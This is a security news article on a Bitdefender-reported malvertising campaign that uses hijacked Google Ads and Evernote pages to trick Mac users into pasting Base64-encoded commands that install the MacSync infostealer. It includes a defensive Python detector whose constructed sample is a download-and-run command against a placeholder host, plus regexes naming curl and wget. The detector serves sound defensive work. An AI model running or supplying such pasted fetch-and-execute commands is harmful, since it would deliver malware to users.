
Hackers have hijacked at least 35 Google Advertiser accounts, launching more than 200 malicious ads targeting Mac users seeking 7-Zip, Notepad++, LibreOffice, Final Cut Pro, and other popular software. A click on the top search result might lead to a malware infection, Bitdefender warns.
The security firm has discovered a new malvertising campaign that infects Mac users with a powerful infostealer, capable of collecting crypto wallet information, account credentials, browser sessions, and exfiltrating files and documents from the system.
When users search for a specific piece of software on Google, carefully targeted malicious sponsored search results appear at the top.
“Mac users searching for popular software like 7-Zip, Notepad++, LibreOffice, and Final Cut Pro may unknowingly land in the middle of an active malvertising campaign,” Bitdefender Labs warned in a report.
The campaign is powered by hijacked Google Advertiser accounts that were previously promoting entirely unrelated services, such as charities, law firms, commercial businesses, travel agencies, hotels, and other legitimate industries.
The 35 identified accounts are widely distributed geographically and originate from at least 15 countries, including the US, Canada, Italy, Poland, Brazil, Germany, India, China, the United Arab Emirates, and others.
Bitdefender observed over 200 paid ads impersonating legitimate macOS software: 7-Zip, Notepad++, The Unarchiver, Homebrew, LibreOffice, Microsoft Office, OBS Studio, Final Cut Pro, PopClip, AppCleaner, Rectangle, PearCleaner, and others.
“The ads are carefully configured to trigger on searches for these exact products. Anyone looking for a legitimate download may unknowingly click a malicious sponsored result instead,” the report reads.
For landing pages, attackers abuse Evernote, a legitimate note-sharing service, which makes the malicious intent harder to detect automatically.
There are no malicious packages on the landing pages – hackers instruct users to open the terminal and paste a command to install the software.
“The ads redirect users to shared Evernote notes. All notes are hosted under the same Evernote account and contain nearly identical content,” the researchers at Bitdefender said.
The pages mimic tutorial-style installation guides. The provided terminal instructions are Base64-encoded to mask the malicious content, while the rest of the product description appears legitimate. Hackers lure users with promises of high compression ratios or advanced features.
This social-engineering method, in which victims are tricked into running the malware themselves and thereby bypassing security controls, is known as ClickFix.
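The tell-tale sign of a ClickFix lure is the shape of the pasted command itself: a Base64 blob that is decoded and piped straight into a shell. The following Python is an added defensive example written for this article, not code from Bitdefender or from the campaign. It decodes any Base64 tokens in a command line so an analyst or a help-desk tool can see what they actually contain, and flags the decode-then-execute pattern. Both sample commands are constructed for the demonstration; the decoded "installer" points at the reserved `example.invalid` domain and is never executed.

```python
import base64
import re

# A run of Base64 alphabet characters long enough to be a payload rather than a word.
B64_RE = re.compile(r"[A-Za-z0-9+/=]{16,}")

# `base64 -d` / `-D` (macOS) / `--decode` whose output is piped into a shell interpreter.
DECODE_PIPE_RE = re.compile(
    r"base64\s+(?:-d|-D|--decode)\b.*?\|\s*(?:/bin/)?(?:sh|bash|zsh)\b", re.S
)

# Commands that pull further content from the network once the blob is decoded.
FETCH_RE = re.compile(r"\b(?:curl|wget)\b")


def find_encoded_payloads(command: str) -> list:
    """Return the decoded text of every Base64 token in `command` that is valid UTF-8."""
    decoded = []
    for match in B64_RE.finditer(command):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
            decoded.append(raw.decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            # Not real Base64 (e.g. a long path or hash); ignore it.
            continue
    return decoded


def assess_command(command: str) -> dict:
    """Classify a terminal one-liner a user was told to paste. Nothing is executed."""
    decoded = find_encoded_payloads(command)
    reasons = []
    if DECODE_PIPE_RE.search(command):
        reasons.append("Base64-decoded text is piped into a shell interpreter")
    for text in decoded:
        if FETCH_RE.search(text):
            reasons.append("decoded payload fetches remote content")
    return {"suspicious": bool(reasons), "reasons": reasons, "decoded": decoded}


# Constructed samples (hypothetical, not taken from the campaign).
_HIDDEN = "curl -fsSL https://example.invalid/setup.sh | sh"
SAMPLE_CLICKFIX = (
    "echo " + base64.b64encode(_HIDDEN.encode()).decode() + " | base64 -d | bash"
)
SAMPLE_BENIGN = "brew install p7zip"

if __name__ == "__main__":
    for cmd in (SAMPLE_CLICKFIX, SAMPLE_BENIGN):
        verdict = assess_command(cmd)
        print(cmd)
        print("  suspicious:", verdict["suspicious"])
        for reason in verdict["reasons"]:
            print("  -", reason)
        for text in verdict["decoded"]:
            print("  decoded:", text)
```

The decode step is what matters operationally: a plain `brew install` line produces no Base64 token at all, whereas the encoded lure decodes to a download-and-run instruction that a user could never have reviewed before pasting. The same check can be run over shell history (`~/.zsh_history`) during incident triage to find out whether such a command was actually executed.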
Powerful malware steals data, crypto
In this campaign, the attackers deliver MacSync as a payload. The malware evolved beyond previously documented variants.
This refined infostealer has many capabilities, including exfiltrating files and documents, displaying fake macOS password prompts to harvest credentials, and stealing browser data, including cookies, saved logins, and extensions.
The malware also collects data from Telegram and macOS Notes and exfiltrates crypto-wallet information. MacSync establishes persistence by replacing legitimate crypto-wallet applications, such as Ledger Live or Trezor.
Bitdefender warns users that the malicious campaign isn’t limited to Mac. It is part of a broader, coordinated ecosystem targeting users across Google and Meta Ads in Windows and macOS environments. Small businesses appear to be a prime target, feeding the campaign with additional advertising accounts to run the scam at scale.
“The same threat actor (or tightly linked group) may be running parallel campaigns across advertising platforms, adapting lures while reusing backend infrastructure,” the report concludes.
Researchers recommend using security tools, scrolling past sponsored results, and never clicking suspicious links or running unknown Terminal commands – legitimate software is never distributed as encoded scripts.